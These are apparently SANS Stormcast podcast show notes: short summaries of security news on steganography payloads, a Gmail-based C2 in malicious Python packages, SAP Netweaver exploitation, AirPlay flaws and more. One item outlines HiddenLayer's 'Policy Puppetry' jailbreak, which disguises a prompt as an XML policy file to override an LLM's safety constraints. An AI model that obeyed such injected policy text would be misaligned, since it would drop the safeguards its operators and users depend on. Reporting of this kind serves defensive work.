SANS Internet Stormcenter Daily Cyber Security Podcast (Stormcast)

Steganography Analysis With pngdump.py: Bitstreams More details from Didiear as to how to extract binary content hidden inside images https://isc.sans.edu/diary/Steganography%20Analysis%20With%20pngdump.py%3A%20Bitstreams/31904 [https://isc.sans.edu/diary/Steganography%20Analysis%20With%20pngdump.py%3A%20Bitstreams/31904] Using Trusted Protocols Against You: Gmail as a C2 Mechanism Attackers are using typosquatting to trick developers into installing malicious python packages. These python packages will use GMail as a command and control channel by sending email to hard coded GMail accounts https://socket.dev/blog/using-trusted-protocols-against-you-gmail-as-a-c2-mechanism [https://socket.dev/blog/using-trusted-protocols-against-you-gmail-as-a-c2-mechanism] Security Brief: French BEC Threat Actor Targets Property Payments A French business email compromise threat actor is targeting property management firms to send emails to tenents tricking them into sending rent payments to fake bank accounts https://www.proofpoint.com/us/blog/threat-insight/security-brief-french-bec-threat-actor-targets-property-payments [https://www.proofpoint.com/us/blog/threat-insight/security-brief-french-bec-threat-actor-targets-property-payments] SANS.edu Research Journal https://isc.sans.edu/j/research [https://isc.sans.edu/j/research]

Web Scanning for Sonicwall Vulnerabilities CVE-2021-20016 For the last week, scans for Sonicwall API login and domain endpoints have skyrocketed. These attacks may be exploiting an older vulnerability or just attempting to brute force credentials. https://isc.sans.edu/diary/Web%20Scanning%20Sonicwall%20for%20CVE-2021-20016/31906 [https://isc.sans.edu/diary/Web%20Scanning%20Sonicwall%20for%20CVE-2021-20016/31906] The Wizards APT Group SLAAC Spoofing Adversary in the Middle Attacks ESET published an article with details regarding an IPv6-linked attack they have observed. Attackers use router advertisements to inject fake recursive DNS servers that are used to inject IP addresses for hostnames used to update software. This leads to the victim downloading malware instead of legitimate updates. https://www.welivesecurity.com/en/eset-research/thewizards-apt-group-slaac-spoofing-adversary-in-the-middle-attacks/ [https://www.welivesecurity.com/en/eset-research/thewizards-apt-group-slaac-spoofing-adversary-in-the-middle-attacks/] Windows RDP Access is Possible with Old Credentials Credential caching may lead to Windows allowing RDP logins with old credentials. https://arstechnica.com/security/2025/04/windows-rdp-lets-you-log-in-using-revoked-passwords-microsoft-is-ok-with-that/?comments-page=1#comments [https://arstechnica.com/security/2025/04/windows-rdp-lets-you-log-in-using-revoked-passwords-microsoft-is-ok-with-that/?comments-page=1#comments]

More Scans for SMS Gateways and APIs Attackers are not just looking for SMS Gateways like the scans we reported on last week, but they are also actively scanning for other ways to use APIs and add on tools to send messages using other people s credentials. https://isc.sans.edu/diary/More%20Scans%20for%20SMS%20Gateways%20and%20APIs/31902 [https://isc.sans.edu/diary/More%20Scans%20for%20SMS%20Gateways%20and%20APIs/31902] AirBorne: AirPlay Vulnerabilities Researchers at Oligo revealed over 20 weaknesses they found in Apple s implementation of the AirPlay protocol. These vulnerabilities can be abused to execute code or launch denial-of-service attacks against affected devices. Apple patched the vulnerabilities in recent updates. https://www.oligo.security/blog/airborne [https://www.oligo.security/blog/airborne]

SRUM-DUMP Version 3: Uncovering Malware Activity in Forensics Mark Baggett released SRUM-DUMP Version 3. The tool simplifies data extraction from Widnows System Resource Usage Monitor (SRUM). This database logs how much resources software used for 30 days, and is invaluable to find out what software was executed when and if it sent or received network data. https://isc.sans.edu/diary/SRUM-DUMP%20Version%203%3A%20Uncovering%20Malware%20Activity%20in%20Forensics/31896 [https://isc.sans.edu/diary/SRUM-DUMP%20Version%203%3A%20Uncovering%20Malware%20Activity%20in%20Forensics/31896] Novel Universal Bypass For All Major LLMS Hidden Layer discovered a new prompt injection technique that bypasses security constraints in large language models. The technique uses an XML formatted prequel for a prompt, which appears to the LLM as a policy file. This Policy Puppetry can be used to rewrite some of the security policies configured for LLMs. Unlike other techniques, this technique works across multiple LLMs without changing the policy. https://hiddenlayer.com/innovation-hub/novel-universal-bypass-for-all-major-llms/ [https://hiddenlayer.com/innovation-hub/novel-universal-bypass-for-all-major-llms/] CHOICEJACKING: Compromising Mobile Devices through Malicious Chargers like a Decade ago The old Juice Jacking is back, at least if you do not run the latest version of Android or iOS. This issue may allow a malicious USB device, particularly a USB charger, to take control of a device connected to it. https://pure.tugraz.at/ws/portalfiles/portal/89650227/Final_Paper_Usenix.pdf [https://pure.tugraz.at/ws/portalfiles/portal/89650227/Final_Paper_Usenix.pdf] SANS @RSA: https://www.sans.org/mlp/rsac/ [https://www.sans.org/mlp/rsac/]

Example of a Payload Delivered Through Steganography Xavier and Didier published two diaries this weekend, building on each other. First, Xavier showed an example of an image being used to smuggle an executable past network defenses, and second, Didier showed how to use his tools to extract the binary. https://isc.sans.edu/diary/Example%20of%20a%20Payload%20Delivered%20Through%20Steganography/31892 [https://isc.sans.edu/diary/Example%20of%20a%20Payload%20Delivered%20Through%20Steganography/31892] SAP Netweaver Exploited CVE-2025-31324 An arbitrary file upload vulnerability in SAP s Netweaver product is actively exploited to upload webshells. Reliaquest discovered the issue. Reliaquest reports that they saw it being abused to upload the Brute Ratel C2 framework. Users of Netweaver must turn off the developmentserver alias and disable visual composer, and the application was deprecated for about 10 years. SAP has released an emergency update for the issue. https://reliaquest.com/blog/threat-spotlight-reliaquest-uncovers-vulnerability-behind-sap-netweaver-compromise/ [https://reliaquest.com/blog/threat-spotlight-reliaquest-uncovers-vulnerability-behind-sap-netweaver-compromise/] https://onapsis.com/blog/active-exploitation-of-sap-vulnerability-cve-2025-31324/ [https://onapsis.com/blog/active-exploitation-of-sap-vulnerability-cve-2025-31324/] Any.Run Reports False Positive Uploads Due to false positives caused by MS Defender XDR flagging Adobe Acrobat Cloud links as malicious, many users of Any.Run s free tier uploaded confidential documents to Any.Run. Anyrun blocked these uploads for now but reminded users to be cautious about what documents are being uploaded. https://x.com/anyrun_app/status/1915429758516560190 [https://x.com/anyrun_app/status/1915429758516560190]